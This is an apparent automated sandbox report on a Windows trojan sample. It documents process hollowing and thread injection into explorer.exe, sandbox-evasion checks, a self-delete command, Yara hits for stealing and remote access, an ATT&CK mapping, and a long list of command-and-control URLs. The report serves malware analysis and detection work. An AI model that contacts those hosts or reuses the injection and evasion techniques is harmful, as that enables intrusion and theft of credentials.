          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E908 mov eax, dword ptr fs:[00000030h]3_2_00F9E908
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E908 mov eax, dword ptr fs:[00000030h]3_2_00F9E908
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5AAEE mov eax, dword ptr fs:[00000030h]3_2_00F5AAEE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5AAEE mov eax, dword ptr fs:[00000030h]3_2_00F5AAEE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20AD0 mov eax, dword ptr fs:[00000030h]3_2_00F20AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54AD0 mov eax, dword ptr fs:[00000030h]3_2_00F54AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54AD0 mov eax, dword ptr fs:[00000030h]3_2_00F54AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28AA0 mov eax, dword ptr fs:[00000030h]3_2_00F28AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28AA0 mov eax, dword ptr fs:[00000030h]3_2_00F28AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76AA4 mov eax, dword ptr fs:[00000030h]3_2_00F76AA4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58A90 mov edx, dword ptr fs:[00000030h]3_2_00F58A90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Code function: 3_2_0040ACF0 LdrLoadDll, 3_2_0040ACF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 172.67.198.102 80
          Source: C:\Windows\explorer.exe; Network Connect: 130.61.77.41 80
          Source: C:\Windows\explorer.exe; Network Connect: 195.35.38.7 80
          Source: C:\Windows\explorer.exe; Network Connect: 103.224.212.216 80
          Source: C:\Windows\explorer.exe; Network Connect: 3.33.130.190 80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Section unmapped: C:\Windows\SysWOW64\control.exe base address: 9E0000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Memory written: C:\Users\user\Desktop\UgHXEfw1uL.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\control.exe; Thread register set: target process: 1028
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Process created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exe
          Source: C:\Windows\SysWOW64\control.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"
          Source: explorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4536328488.0000000004B00000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.4531444837.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2075184468.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PProgman
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Users\user\Desktop\UgHXEfw1uL.exe VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match; File source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Shared Modules (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: Rootkit (1); Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12)
          Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (112); Remote System Discovery; System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (4); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
          Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Behavior Graph (ID: 1348466; Sample: UgHXEfw1uL.exe; Startdate: 27/11/2023; Architecture: WINDOWS; Score: 100)
          Process chain: UgHXEfw1uL.exe (started) -> UgHXEfw1uL.exe (started) -> explorer.exe (injected) -> control.exe (started) -> cmd.exe (started) -> conhost.exe (started)
          Sample: www.videopromarket.com; www.tqmsn.com; 11 other IPs or domains. Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
          UgHXEfw1uL.exe (first process): Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
          UgHXEfw1uL.exe (second process): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          explorer.exe: System process connects to network (likely due to code injection or exploit); www.biddrivego.com 103.224.212.216, 49722, 80 (TRELLIAN-AS-AP Trellian Pty Limited AU, Australia); www.fnb.gay 130.61.77.41, 49717, 49718, 80 (ORACLE-BMC-31898 US, United States); 3 other IPs or domains
          control.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements

          Source          Detection  Scanner         Label                 Link
          UgHXEfw1uL.exe  22%        ReversingLabs   Win32.Trojan.Generic
          UgHXEfw1uL.exe  32%        Virustotal                            Browse
          UgHXEfw1uL.exe  100%       Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
                        • Avira URL Cloud: safe
                        unknown
                        http://www.turdfi.xyzexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.adminonlinechecker.online/bp31/www.gchzwf.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.videopromarket.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.gchzwf.com/bp31/explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000004.00000002.4544685051.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2081190838.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fnb.gay/control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fnb.gayReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.spitzpr-gq.infoReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.videopromarket.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://excel.office.comexplorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://schemas.microexplorer.exe, 00000004.00000002.4540163883.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4540212535.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4539524842.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.spitzpr-gq.info/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyzReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bolfm.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fnb.gay/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=UJqh63c9yiVXKVsa3boGAX6IISqW51ijhAAZGwRUcontrol.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.000000000310A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.tqmsn.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.fixerradvisory.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyz/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.alnawrasalrahhal.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.adminonlinechecker.onlineexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.gchzwf.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyz/bp31/www.biddrivego.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.darkpinefarm.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tqmsn.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.biddrivego.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fnb.gay/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.millerstoehr.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fixerradvisory.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
